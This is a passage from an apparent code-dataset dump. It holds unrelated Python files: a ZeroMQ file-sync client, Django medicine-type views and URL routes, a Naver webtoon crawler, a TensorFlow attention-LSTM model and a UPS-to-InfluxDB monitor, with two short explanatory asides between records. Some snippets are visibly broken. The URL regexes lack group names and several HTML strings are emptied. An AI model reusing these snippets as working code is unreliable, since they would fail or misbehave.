Can't remove: \" + str(msg))\n #Otherwise, remove as appropriate\n elif(os.path.isdir(dest_path)):\n self.logger.log(\"INFO\",\"Removing entire file tree at \" + dest_path)\n shutil.rmtree(dest_path)\n else:\n self.logger.log(\"INFO\",\"Removing file at\" + dest_path)\n os.remove(dest_path)\n\n def _on_move_(self, msg):\n \"\"\"\n Called anytime a file system object is moved\n \"\"\"\n\n #Get absolute paths\n src_path = self.config[\"PATH_BASE\"] + msg[1]\n dest_path = self.config[\"PATH_BASE\"] + msg[2]\n\n #If source doesn't exist, throw an error\n if not os.path.exists(src_path):\n self.logger.log(\"ERROR\",\"File system object at \" + dest_path + \" does not exist. Cannot move: \" + str(msg))\n #Otherwise, handle as appropriate\n elif(os.path.isdir(src_path)):\n self.logger.log(\"INFO\",\"Moving directory at \" + src_path + \" to \" + dest_path)\n shutil.copytree(src_path, dest_path)\n shutil.rmtree(src_path)\n else:\n self.logger.log(\"INFO\",\"Moving file at\" + src_path + \"to\" + dest_path)\n shutil.copy2(src_path, dest_path)\n os.remove(src_path)\n\n def _on_finish_(self):\n \"\"\"\n Called by every thread after it has finished its dispatch task.\n Asks controller to restore daemon operation. Other cleanup can go here\n as well.\n \"\"\"\n with self.server_sync_throw_lock:\n msg = [self.msg_identifier[\"START_MONITORING\"],str(threading.current_thread().ident)]\n self.internal_request_socket.send_multipart(encode(msg))","sub_path":"FinalOneDir/Controllers/Client/ClientSyncResponder.py","file_name":"ClientSyncResponder.py","file_ext":"py","file_size_in_byte":8888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
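The msg.remove(msg[0]) in _listen_ works because ZeroMQ PUB/SUB filtering is prefix-based: the server publishes multipart messages whose first frame is the username topic, and the subscriber strips that frame before dispatching. A minimal pair showing the framing (port and payload are illustrative; shown linearly, though a real subscriber must be connected before the publish happens):

import zmq

ctx = zmq.Context.instance()

pub = ctx.socket(zmq.PUB)                 # server side
pub.bind('tcp://*:5556')

sub = ctx.socket(zmq.SUB)                 # client side
sub.connect('tcp://localhost:5556')
sub.setsockopt(zmq.SUBSCRIBE, b'alice')   # only alice's directives arrive

pub.send_multipart([b'alice', b'MKDIR', b'/photos'])  # frame 0 = topic
msg = sub.recv_multipart()
msg = msg[1:]                             # drop the topic frame, as _listen_ does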
+{"seq_id":"491957033","text":"from flask import Flask\nfrom .isite import Site_Main_Flask_Obj\nfrom logging import getLogger\nimport sys\n\nlogger = getLogger(__name__)\nlogger.setLevel('DEBUG')\n\nprint('hello', file=sys.stderr)\n\napp = Flask(__name__)\napp.register_blueprint(Site_Main_Flask_Obj)\n\n\nport=5000\nprint('hello2', file=sys.stderr)\nlogger.debug('starting iserver on port %d' % port)\nprint('starting iserver on port %d' % port, file=sys.stderr)\napp.run(host='0.0.0.0', port=port)\n","sub_path":"iserver/iserver.py","file_name":"iserver.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"487927849","text":"from django_datatables_view.base_datatable_view import BaseDatatableView\nfrom django.utils.html import escape\nfrom register_disease_data.models import MedicineType\nfrom django.db.models import Q\nfrom django.http import HttpResponse\nfrom django.shortcuts import get_object_or_404\nimport traceback\n\n\nclass medicineType_datatable(BaseDatatableView):\n order_columns = ['name']\n columns = ['name','id']\n def get_initial_queryset(self):\n return MedicineType.objects.order_by(\"id\")\n def filter_queryset(self, qs):\n search = self.request.GET.get('search[value]', None)\n if search:\n qs = qs.filter(name__contains=search)\n filter_customer = self.request.GET.get('MedicineType', None)\n\n if filter_customer:\n customer_parts = filter_customer.split(' ')\n qs_params = None\n for part in customer_parts:\n q = Q(customer_firstname__contains=part)|Q(customer_lastname__contains=part)\n qs_params = qs_params | q if qs_params else q\n qs = qs.filter(qs_params)\n return qs\n\n def prepare_results(self, qs):\n\n json_data = []\n for item in qs:\n json_data.append([\n escape(item.name),\n item.id\n ])\n return json_data\n\n\n\ndef browse_medicineType_name(request):\n if request.method == 'POST':\n key = request.POST.get('key')\n if not key:\n return HttpResponse(\"\")\n filtered_data=MedicineType.objects.filter(name__contains=key)[0:10]\n html='';\n for data in filtered_data:\n html=html.__add__('' % data.name)\n return HttpResponse(html)\n return HttpResponse(\"invalid access!\")\n\n\n\ndef save_medicineType(request):\n if request.method == 'POST':\n name = request.POST.get('name')\n if not name:\n return HttpResponse(\"Enter valid name!\")\n name=name.strip().replace('\"', '')\n if name==\"\":\n return HttpResponse(\"Enter valid name!\")\n try:\n MedicineTypeData=MedicineType.objects.get(name=name)\n return HttpResponse(\"This name already registered!\");\n except MedicineType.DoesNotExist:\n try:\n MedicineType.objects.create(name=name,registralUserName_id=1).save()\n return HttpResponse(\"yes\")\n except Exception as e:\n return HttpResponse(\"error occurred\");\n return HttpResponse(\"invalid access!\")\n\n\n\n\ndef update_medicineType(request):\n if request.method == 'POST':\n name = request.POST.get('name')\n id = request.POST.get('id')\n if not name:\n return HttpResponse(\"Enter valid name!\")\n if not id:\n return HttpResponse(\"Select valid medicine type to update!\")\n name=name.strip().replace('\"', '')\n\n if name==\"\":\n return HttpResponse(\"Enter valid name!\")\n\n try:\n data=MedicineType.objects.get(pk=id)\n try:\n MedicineTypeData = MedicineType.objects.exclude(pk=id).filter(name=name)[0:10]\n if MedicineTypeData.exists():\n return HttpResponse(\"This name already exist!\");\n try:\n MedicineType.objects.filter(pk=id).update(name=name)\n return HttpResponse(\"yes\")\n except Exception as e:\n return HttpResponse(\"error occurred\");\n except MedicineType.DoesNotExist:\n try:\n MedicineType.objects.filter(pk=id).update(name=name)\n return HttpResponse(\"yes\")\n except Exception as e:\n return HttpResponse(\"error occurred\");\n except MedicineType.DoesNotExist:\n return HttpResponse(\"Select valid medicine type to update!\")\n return HttpResponse(\"invalid access!\")\n\n\n\n\ndef delete_medicineType(request):\n if request.method == 'POST':\n id = request.POST.get('id')\n if not id:\n return HttpResponse(\"Select valid medicine type to delete!\")\n try:\n data=MedicineType.objects.get(pk=id)\n MedicineType.objects.filter(pk=id).delete()\n return 
HttpResponse(\"yes\")\n except MedicineType.DoesNotExist:\n return HttpResponse(\"Select valid medicine type to delete!\")\n return HttpResponse(\"invalid access!\")\n","sub_path":"hdds/manage_medicine_type/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"85264100","text":"# -*- coding: utf-8 -*-\n\nimport time\nimport os\nimport requests as rq\nfrom bs4 import BeautifulSoup as bs\nfrom multiprocessing import Process as proc\nimport codecs as cd\nimport re\n\n'''\nalgorithm:\n get 요일 : 월~일\n get 웹툰이름 : 각각의 요일대로 attach\n get 웹툰순위 : 웹툰 이름 가져올 때 그 순서에 순위매기기\n get 웹툰URL : 웹툰 이름에 attach\n\n print 요일별 웹툰 by order 순위\n print user choices menu\n i.e) one choice : >>> mon1\n i.e) many choice : >>> mon1 sun3 sat 2\n wait user input\n\n user input? start crawl \n\ndata type:\n {$요일$:{$웹툰순위$:{$웹툰이름$:$웹툰URL$}, ...}, ...}\ndata type scheme:\n 월--+\n +-- (1) ---+-- 신의탑\n + +-- ($신의탑URL$)\n +-- (2) ------ (웹툰이름)\n +-- ($URL$)\n 화--+\n +-- (1) ---+-- (웹툰이름)\n + +-- ($URL$)\n +-- (2) ------ (웹툰이름)\n +-- ($URL$)\n'''\n\ndef htmling(title, subtitle, img_numbers, directory):\n html = ''\n head = ''''''\n titles = title+' '+subtitle\n body = '''\n \n '''\n img_tag = ['
<img src=\"', '.jpg\">']\n    img_tags = []\n    for img_number in img_numbers:\n        img_tags.append(img_tag[0]+str(img_number)+img_tag[1])\n    tail = '''
'''\n\n html += head\n html += titles\n html += body\n for img in img_tags:\n html += img \n html += tail\n \n html_path = os.path.join(directory, titles+'.html')\n\n with cd.open(html_path,'w', 'utf-8') as f:\n f.write(html)\n \n print(titles+' '+': crawl success')\n\ndef crawl(url):\n html = rq.get(url).text\n soup = bs(html, 'html.parser')\n\n title = ' '.join(soup.select('.comicinfo h2')[0].text.split())\n subtitle = ' '.join(soup.select('.tit_area h3')[0].text.split())\n\n if subtitle.find(u'부') is -1:\n subtitle = ' '.join([u'1부', subtitle])\n\n img_numbers = []\n \n for i in range(len(soup.select('.wt_viewer img'))):\n img_numbers.append(i+1)\n img = soup.select('.wt_viewer img')[i]\n dir_path = os.path.join(os.path.dirname(__file__), title, subtitle)\n if not os.path.exists(dir_path):\n os.makedirs(dir_path)\n file_path = os.path.join(dir_path, str(i+1)+'.jpg')\n \n image = rq.get(img['src'], headers={'Referer': url}).content\n with open(file_path, 'wb') as f: f.write(image)\n\n htmling(title=title, subtitle=subtitle, img_numbers=img_numbers, directory=dir_path)\n \ndef multi_crawl(target_url, ran, ge):\n\n for i in range(ran,ge):\n crawl(target_url+str(i))\n time.sleep(1)\n\nif __name__ ==\"__main__\":\n #\n # SETUP\n #\n root_url = 'http://comic.naver.com'\n main_url = root_url + '/webtoon/weekday.nhn'\n html = rq.get(main_url).text\n soup = bs(html, 'html.parser')\n\n #\n # SET 요일\n #\n day_of_week = {\n 'mon':'월요 웹툰',\n 'tue':'화요 웹툰',\n 'wed':'수요 웹툰',\n 'thu':'목요 웹툰',\n 'fri':'금요 웹툰',\n 'sat':'토요 웹툰',\n 'sun':'일요 웹툰'\n }\n data_set = {}\n for day in day_of_week.keys():\n data_set[day]={}\n ### 완성 : {mon:{}, tue:{}, wed:{}, ...}\n\n #\n # \"GET 웹툰 이름, 순위, URL\" 를 위한 데이터 수집\n #\n\n days_webtoon = soup.select('.list_area ul')\n ''' \n ul : 요일별 웹툰리스트를 가져옴\n days_webtoon[0].select('a.title') : 월요일 웹툰들.\n days_webtoon[0].select('a.title')[0] : 신의탑.\n '''\n days=[]\n for idx in range(len(days_webtoon)):\n days.append(days_webtoon[idx].select('a.title'))\n '''\n days[0] : 월요일 웹툰들.\n days[0][0] : 신의탑. \n (참조 : days[0][0].text : 신의탑 이름)\n (참조 : days[0][0]['href'] : 신의탑 URL)\n '''\n\n #\n # SET data_set\n #\n '''\n data_set[월요웰툽][1]={이름:URL} 이걸 한꺼번에 하는 코드\n i ii iii iv\n i -> 정의:요일 // 구체화:for idx in range(len(data_set.keys())):\n data_set.keys()[idx]\n ii -> 정의:순위 // 구체화:for rank in range(len(days[idx])):\n rank\n iii -> 정의:웹툰이름 // 구체화: days[idx][rank].text\n iv -> 정의:웹툰URL // 구체화: days[idx][rank]['href']\n 종합:\n '''\n keys = list(data_set.keys())\n for idx in range(len(keys)):\n for rank in range(len(days[idx])):\n data_set[keys[idx]][rank+1] = (\n days[idx][rank].text , days[idx][rank]['href']\n )\n ### 완성 {'mon':{1:('신의탑',$웹툰URL$), ...}, ...}\n for day in data_set.keys():\n print(day_of_week[day])\n for rank in data_set[day].keys():\n title, url = data_set[day][rank]\n print(str(rank)+' : '+title)\n print('\\n')\n print('월 - mon, 화 - tue, 수 - wed, 목 - thu, 금 - fri, 토 - sat, 일 - sun')\n print('크롤링 할 코드를 입력하세요. 
예를 들어 신의탑 크롤링은 mon1 입력.')\n user_input = input('>>> ')\n day = user_input[:3]\n rank = user_input[3:]\n \n list_url = root_url + data_set[day][int(rank)][1]\n titleId = re.findall(r'titleId=\\d+', list_url)[0].split('=')[1]\n\n html = rq.get(list_url).text\n soup = bs(html, 'html.parser')\n\n links = soup.select('.title a')\n latest_no = 1+int(\n re.findall(r'no=\\d+', links[0]['href'])[0]\n .split('=')[1])\n\n target_url = root_url+'/webtoon/detail.nhn?titleId='+titleId+'&no='\n\n div = round(latest_no/5)\n\n proc1 = proc(target=multi_crawl,args=(target_url, 1, div,))\n proc2 = proc(target=multi_crawl,args=(target_url, div+1, div*2,))\n proc3 = proc(target=multi_crawl,args=(target_url, div*2+1, div*3,))\n proc4 = proc(target=multi_crawl,args=(target_url, div*3+1, div*4,))\n proc5 = proc(target=multi_crawl,args=(target_url, div*4+1, latest_no,))\n\n proc1.start()\n proc2.start()\n proc3.start()\n proc4.start()\n proc5.start()\n\n proc1.join()\n proc2.join()\n proc3.join()\n proc4.join()\n proc5.join()\n","sub_path":"main_page.py","file_name":"main_page.py","file_ext":"py","file_size_in_byte":7148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"36835936","text":"import tensorflow as tf\nimport numpy as np\n\n\n\"\"\"\n bi_attn_lstm model\n\"\"\"\n\nclass EncoderModel(object):\n\n def __init__(self,\n batch_size,\n glossary_size,\n embedding_size,\n hidden_size,\n attn_lenth):\n self.batch_size = batch_size\n self.glossary_size = glossary_size\n self.embedding_size = embedding_size\n self.hidden_size = hidden_size\n self.attn_lenth = attn_lenth\n\n\n def build_train_graph(self):\n inputs, lenth, labels = self.define_IO()\n self.trainable_parameters()\n inputs = self.embedding_layer(inputs)\n outputs = self.bi_attn_lstm_layer(inputs, lenth)\n outputs = self.bi_sigmoid_layer(outputs)\n self.loss_and_optimize(outputs, labels)\n\n\n def define_IO(self):\n self.inputs = tf.placeholder(tf.int32, shape=[self.batch_size, None], name='inputs')\n self.labels = tf.placeholder(tf.float32, shape=[self.batch_size, 1], name='targets')\n self.lenth = tf.placeholder(tf.int32, shape=[self.batch_size], name='lenth')\n self.pretrained_wv = tf.placeholder(tf.float32, shape=[self.glossary_size, self.embedding_size])\n return self.inputs, self.lenth, self.labels\n\n\n def trainable_parameters(self):\n self.keep_prob = 0.5\n with tf.name_scope('embeddings'), tf.variable_scope('embeddings'):\n # self.embeddings = tf.Variable(self.pretrained_wv, name='embeddings')\n self.embeddings = tf.Variable(tf.truncated_normal([self.glossary_size, self.embedding_size], stddev=0.1), name='embeddings')\n with tf.name_scope('lstm'), tf.variable_scope('lstm'):\n self.lstm_fw_cell = tf.contrib.rnn.BasicLSTMCell(self.hidden_size, forget_bias=1.0, state_is_tuple=True)\n self.lstm_bw_cell = tf.contrib.rnn.BasicLSTMCell(self.hidden_size, forget_bias=1.0, state_is_tuple=True)\n with tf.name_scope('attention'), tf.variable_scope('attention'):\n self.u1_w = tf.Variable(tf.truncated_normal([2*self.hidden_size, self.attn_lenth], stddev=0.1), name='attention_w')\n self.u1_b = tf.Variable(tf.constant(0.1, shape=[self.attn_lenth]), name='attention_b')\n self.u2_w = tf.Variable(tf.truncated_normal([self.attn_lenth, 1], stddev=0.1), name='attention_uw')\n with tf.name_scope('lastlayer'), tf.variable_scope('lastlayer'):\n self.sigmoid_weights = tf.Variable(tf.random_uniform(shape=[self.hidden_size * 2, 1], minval=-1.0, maxval=1.0), name='sigmoid_w')\n self.sigmoid_biases = tf.Variable(tf.zeros([1]), name='sigmoid_b')\n\n\n \"\"\"\n arg:\n inputs - shape=[batch_size, seq_size]\n return:\n outputs - shape=[batch_size, seq_size, hidden_size]\n \"\"\"\n def embedding_layer(self, inputs):\n with tf.name_scope('embeddings'), tf.variable_scope('embeddings'):\n embeded_outputs = tf.nn.embedding_lookup(self.embeddings, inputs)\n embeded_outputs = tf.nn.dropout(embeded_outputs, keep_prob=self.keep_prob)\n return embeded_outputs\n\n\n \"\"\"\n arg:\n inputs - shape=[batch_size, seq_size, hidden_size]\n return:\n outputs - shape=[batch_size, hidden_size*2]\n \"\"\"\n def bi_attn_lstm_layer(self, inputs, lenth):\n with tf.name_scope('lstm'), tf.variable_scope('lstm'):\n drop_lstm_fw_cell = tf.contrib.rnn.DropoutWrapper(cell=self.lstm_fw_cell, output_keep_prob=self.keep_prob)\n drop_lstm_bw_cell = tf.contrib.rnn.DropoutWrapper(cell=self.lstm_bw_cell, output_keep_prob=self.keep_prob)\n\n rnn_outputs, _ = tf.nn.bidirectional_dynamic_rnn(drop_lstm_fw_cell, drop_lstm_bw_cell, inputs, sequence_length=lenth, dtype=tf.float32)\n rnn_outputs = tf.concat(rnn_outputs, axis=2)\n\n # 'outputs' is now shape of[128*60*600]\n # a = softmax(u2_w(tanh(u1_w*x+u1_b)))\n # outputs = tf.reshape(outputs, 
[-relu, 2*self.hidden_size])\n # attn_z = tf.matmul(outputs, self.u1_w) + self.u1_b\n # outputs = tf.reshape(outputs, [self.batch_size, self.seq_size, 2*self.hidden_size])\n # attn_z = tf.reshape(tf.matmul(attn_z, self.u2_w), [self.batch_size, self.seq_size])\n # alpha = tf.nn.softmax(attn_z)\n # alpha = tf.reshape(alpha, [self.batch_size, self.seq_size, relu])\n # self.alpha = alpha\n # outputs = tf.reduce_sum(outputs * alpha, axis=relu)\n with tf.name_scope('attention'), tf.variable_scope('attention'):\n attn_outputs = []\n for i in range(self.batch_size):\n attn_output = rnn_outputs[i][:lenth[i]]\n attn_z = tf.matmul(tf.tanh(tf.matmul(attn_output, self.u1_w) + self.u1_b), self.u2_w)\n alpha = tf.nn.softmax(attn_z)\n attn_output = tf.reduce_sum(attn_output * alpha, axis=0)\n attn_outputs.append(attn_output)\n attn_outputs = tf.convert_to_tensor(attn_outputs)\n return attn_outputs\n\n\n \"\"\"\n arg:\n inputs - shape=[batch_size, hidden_size]\n return:\n outputs - shape=[batch_size, relu]\n \"\"\"\n def bi_sigmoid_layer(self, inputs):\n with tf.name_scope('lastlayer'), tf.variable_scope('lastlayer'):\n logits = tf.matmul(inputs, self.sigmoid_weights) + self.sigmoid_biases\n return logits\n\n\n \"\"\"\n arg:\n inputs - shape=[batch_size, seq_size, glossary_size]\n labels - shape=[batch_size, seq_size]\n return:\n outputs - shape=[batch_size, seq_size, hidden_size]\n \"\"\"\n def loss_and_optimize(self, inputs, labels):\n self.learning_rate = tf.placeholder(tf.float32)\n\n loss = tf.nn.sigmoid_cross_entropy_with_logits(logits=inputs, labels=labels)\n self.loss = tf.reduce_mean(loss)\n\n train_vars = tf.trainable_variables()\n self.max_grad_norm = 1\n grads, _ = tf.clip_by_global_norm(tf.gradients(loss, train_vars), self.max_grad_norm)\n\n # self.optimizer = tf.train.GradientDescentOptimizer(self.learning_rate).apply_gradients(zip(grads, train_vars))\n self.optimizer = tf.train.AdamOptimizer(self.learning_rate).minimize(loss)\n\n self.train_scalar = tf.summary.scalar('train_loss', self.loss)\n self.train_accuracy = tf.reduce_mean(tf.cast(tf.equal(tf.round(tf.sigmoid(inputs)), labels), tf.float32))\n\n\n\n def build_validate_graph(self, dev_batch_size):\n # IO\n self.dev_inputs = tf.placeholder(tf.int32, shape=[dev_batch_size, None])\n self.dev_labels = tf.placeholder(tf.float32, shape=[dev_batch_size, 1])\n self.dev_lenth = tf.placeholder(tf.int32, shape=[dev_batch_size])\n\n with tf.name_scope('valid'), tf.variable_scope('valid'):\n embeded_outputs = tf.nn.embedding_lookup(self.embeddings, self.dev_inputs)\n\n rnn_outputs, _ = tf.nn.bidirectional_dynamic_rnn(self.lstm_fw_cell, self.lstm_bw_cell, embeded_outputs, sequence_length=self.dev_lenth, dtype=tf.float32)\n rnn_outputs = tf.concat(rnn_outputs, axis=2)\n\n attn_outputs = []\n for i in range(dev_batch_size):\n attn_output = rnn_outputs[i][:self.dev_lenth[i]]\n attn_z = tf.matmul(tf.tanh(tf.matmul(attn_output, self.u1_w) + self.u1_b), self.u2_w)\n alpha = tf.nn.softmax(attn_z)\n attn_output = tf.reduce_sum(attn_output * alpha, axis=0)\n attn_outputs.append(attn_output)\n attn_outputs = tf.convert_to_tensor(attn_outputs)\n\n logits = tf.matmul(attn_outputs, self.sigmoid_weights) + self.sigmoid_biases\n loss = tf.nn.sigmoid_cross_entropy_with_logits(logits=logits, labels=self.dev_labels)\n self.dev_loss = tf.reduce_sum(loss) / dev_batch_size\n self.dev_scalar = tf.summary.scalar('validation_loss', self.dev_loss)\n\n self.expection = tf.sigmoid(logits)\n self.dev_accuracy = tf.reduce_mean(tf.cast(tf.equal(tf.round(tf.sigmoid(logits)), 
self.dev_labels), tf.float32))\n\n\n\n\n def build_test_graph(self, seq_size):\n # IO\n self.test_inputs = tf.placeholder(tf.int32, shape=[None, seq_size])\n self.test_labels = tf.placeholder(tf.float32, shape=[None, 1])\n self.test_lenth = tf.placeholder(tf.int32, shape=[None])\n\n # init\n self.embeddings = tf.Variable(tf.random_uniform(shape=[self.glossary_size, self.embedding_size],\n minval=-1.0, maxval=1.0), name='embeddings')\n self.lstm_fw_cell = tf.contrib.rnn.BasicLSTMCell(self.hidden_size, forget_bias=1.0, state_is_tuple=True)\n self.lstm_bw_cell = tf.contrib.rnn.BasicLSTMCell(self.hidden_size, forget_bias=1.0, state_is_tuple=True)\n\n # embedding\n embeded_outputs = tf.nn.embedding_lookup(self.embeddings, self.test_inputs)\n # rnn\n rnn_outputs, _ = tf.nn.bidirectional_dynamic_rnn(self.lstm_fw_cell, self.lstm_bw_cell, embeded_outputs,\n sequence_length=self.test_lenth, dtype=tf.float32)\n rnn_outputs = tf.concat(rnn_outputs, axis=2)\n\n with tf.name_scope('attention'), tf.variable_scope('attention'):\n self.u1_w = tf.Variable(tf.truncated_normal([2 * self.hidden_size, self.attn_lenth], stddev=0.1),\n name='attention_w')\n self.u1_b = tf.Variable(tf.constant(0.1, shape=[self.attn_lenth]), name='attention_b')\n self.u2_w = tf.Variable(tf.truncated_normal([self.attn_lenth, 1], stddev=0.1), name='attention_uw')\n rnn_outputs = tf.reshape(rnn_outputs, [-1, 2 * self.hidden_size])\n attn_z = tf.matmul(rnn_outputs, self.u1_w) + self.u1_b\n rnn_outputs = tf.reshape(rnn_outputs, [-1, seq_size, 2 * self.hidden_size])\n attn_z = tf.reshape(tf.matmul(attn_z, self.u2_w), [-1, seq_size])\n alpha = tf.nn.softmax(attn_z)\n alpha = tf.reshape(alpha, [-1, seq_size, 1])\n rnn_outputs = tf.reduce_sum(rnn_outputs * alpha, axis=1)\n self.alpha = alpha\n\n # sigmoid\n sigmoid_weights = tf.Variable(tf.random_uniform(shape=[self.hidden_size * 2, 1],\n minval=-1.0, maxval=1.0), name='softmax_weights')\n sigmoid_biases = tf.Variable(tf.zeros([1]), name='softmax_biases')\n logits = tf.matmul(rnn_outputs, sigmoid_weights) + sigmoid_biases\n loss = tf.nn.sigmoid_cross_entropy_with_logits(logits=logits, labels=self.test_labels)\n self.test_loss = tf.reduce_mean(loss)\n\n # accuracy rate\n self.expection = tf.round(tf.sigmoid(logits))\n self.test_accuracy = tf.reduce_mean(tf.cast(tf.equal(tf.round(tf.sigmoid(logits)), self.test_labels), tf.float32))","sub_path":"history_version/v0.0/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":10823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
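All three graphs in this model build the same attention block: scores a = softmax(u2_w . tanh(u1_w . h + u1_b)), followed by an alpha-weighted sum over timesteps. A numpy sketch of that computation for one sequence (h is [T, 2*hidden_size], matching the code above; names are illustrative):

import numpy as np

def attention_pool(h, u1_w, u1_b, u2_w):
    # h: [T, 2H] -> pooled [2H]; mirrors the attn_z / alpha math above
    attn_z = np.tanh(h @ u1_w + u1_b) @ u2_w   # [T, 1] scores
    e = np.exp(attn_z - attn_z.max())          # numerically stable softmax
    alpha = e / e.sum()                        # weights over timesteps
    return (h * alpha).sum(axis=0)             # weighted sum -> [2H]

T, H, A = 7, 4, 3
rng = np.random.default_rng(0)
pooled = attention_pool(rng.normal(size=(T, 2 * H)),
                        rng.normal(size=(2 * H, A)),
                        np.zeros(A), rng.normal(size=(A, 1)))
print(pooled.shape)  # (8,)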
+{"seq_id":"639648889","text":"import datetime\nfrom sanitize import test_usr, get_datetime_obj\nfrom event import Event\n\ndef make_year(year=datetime.datetime.now().year):\n \"\"\"This returns a yearly calendar as shown above\"\"\"\n cal = {year: {}}\n thirty_one = [1,3,5,7,8,10,12]\n for month in range(1,13):\n if month in thirty_one:\n days = dict(zip([x for x in range(1,32)], [[] for x in range(1,32)]))\n cal[year][month] = days\n elif month == 2:\n days = dict(zip([x for x in range(1,29)], [[] for x in range(1,29)]))\n cal[year][month] = days\n else:\n days = dict(zip([x for x in range(1,31)], [[] for x in range(1,31)]))\n cal[year][month] = days\n\n with open('cal.dict', 'w') as file:\n file.write(cal.__repr__())\n return cal\n\ndef add_event():\n if test_usr('\\nNeed to add something?'):\n print(\"\\nYOU GOT IT, ONE EVENT OBJECT COMING RIGHT AFTER THESE MESSAGES\")\n \n e_obj = Event(get_datetime_obj())\n\n e_obj.print_event_details()\n","sub_path":"manipulate_cal.py","file_name":"manipulate_cal.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"153248035","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.Years.as_view(), name='years'),\n url(r'^(?P[0-9]{4})/$',\n views.ReportYearArchiveView.as_view(),\n name='report_year_archive',\n ),\n url(r'^(?P[0-9]{4})/(?P[0-9]{2})/$',\n views.ReportMonthArchiveView.as_view(),\n name='month_report_list',\n ),\n url(r'^batch/(?P[A-Za-z0-9]+)/$',\n views.BatchSummaryView.as_view(),\n name='batch_summary',\n ),\n url(\n r'^stats/(?P[A-Za-z\\-_]+)/(?P[A-Za-z0-9]+)/(?P[0-9]+)/$',\n views.stats,\n name='stats_report',\n ),\n url(r'^stats/(?P[A-Za-z\\-_]+)/(?P[A-Za-z0-9]+)/$',\n views.stats,\n kwargs={'segment': None},\n name='total_stats_report',\n )\n]","sub_path":"summary_report/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"192778039","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Aug 5 16:01:51 2018\n\n\"\"\"\n\nimport datetime\nimport re\nimport socket\nimport subprocess\nimport time\n\nimport influx_handler\n\n\ndef run_status_cmd(timeout=None):\n \"\"\"\n Runs the command to retrieve UPS status information and returns the output as a string.\n \"\"\"\n args = [\"sudo\", \"pwrstat\", \"-status\"]\n\n command = subprocess.run(\n args=args,\n timeout=timeout,\n check=True,\n stdout=subprocess.PIPE)\n\n return (command.stdout).decode('utf-8')\n\n\ndef extract_values_from_output(cmd_output_as_string):\n \"\"\"\n Given the raw text output of the UPS info command, this function parses it into a dictionary.\n \"\"\"\n\n # filter out newlines, tabs, and split on more than 2 periods at a time\n regex_to_match = r\"['.'|\\n|\\t]{2,}|\"\n\n separated_text = re.split(regex_to_match, cmd_output_as_string)\n\n # the entry at index 10 just says \"current ups status\"\n del separated_text[10]\n # the first 2 entries don't contain any useful data\n return separated_text[2:]\n\n\ndef convert_values_to_dict(data_as_list):\n # Would have used enumerate() here if it let you specify a step size\n data_dictionary = {}\n for index in range(0, len(data_as_list), 2):\n # the data list has the form: ['key/name', 'value', 'key/name', 'value']\n if data_as_list[index] == '':\n break\n\n current_key, current_value = data_as_list[index], data_as_list[index +\n 1]\n\n # grafana cant properly graph non-numeric values, so strip non-numeric characters\n data_dictionary[current_key] = current_value.strip()\n\n return data_dictionary\n\n\ndef parse_cyberpower_load_readings(load_string):\n \"\"\"\n Load string has the form: \" Watt (Y%)\" which needs to be converted to a list [X, Y]\n where X is the absolute/raw Load value and Y is the percentage value, relative to the maximum of your UPS outputs.\n \"\"\"\n\n parsed_load_readings = list(\n filter(None,\n [re.sub(r\"\\D\", \"\", string) for string in load_string.split()]))\n\n if len(parsed_load_readings) == 2:\n return parsed_load_readings\n\n else:\n raise ValueError(\n \"Unable to parse load reading string: {0}\".format(load_string))\n\n\ndef parse_data_dict_for_influx(data_dictionary):\n \"\"\"\n This takes a dictionary of keys/values of data measurements and converts it to a JSON array\n appropriate for sending to Influx.\n \"\"\"\n\n measurements_array = []\n for key, value in data_dictionary.items():\n measurement_dict = {}\n\n measurement_dict['tags'] = {\"host\": socket.gethostname()}\n\n measurement_dict['measurement'] = key\n\n measurement_dict['time'] = datetime.datetime.utcnow().strftime(\n '%Y-%m-%dT%H:%M:%SZ')\n\n # grafana will only let you use the \"graph panel\" charts with numeric types, not strings\n numeric_only_keys = [\n 'Utility Voltage', 'Output Voltage', 'Battery Capacity',\n 'Remaining Runtime'\n ]\n\n if key in numeric_only_keys:\n value = re.sub('[^0-9]', '', value)\n measurement_dict['fields'] = {'value': int(value)}\n\n elif key == 'Load':\n load_raw, load_pct = tuple(parse_cyberpower_load_readings(value))\n measurement_dict['fields'] = {\n 'value_raw': int(load_raw),\n 'value_pct': int(load_pct)\n }\n\n else:\n measurement_dict['fields'] = {\"value\": value}\n\n measurements_array.append(measurement_dict)\n\n return measurements_array\n\n\nif __name__ == '__main__':\n while True:\n command_output = run_status_cmd()\n\n splitted_values = extract_values_from_output(command_output)\n\n data_dict = 
convert_values_to_dict(splitted_values)\n\n influx_ready_array = parse_data_dict_for_influx(data_dict)\n\n influx_client = influx_handler.initialize_influx()\n\n resp = influx_handler.send_data_to_influx(influx_client, influx_ready_array)\n time.sleep(1)\n","sub_path":"cyberpower.py","file_name":"cyberpower.py","file_ext":"py","file_size_in_byte":4116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
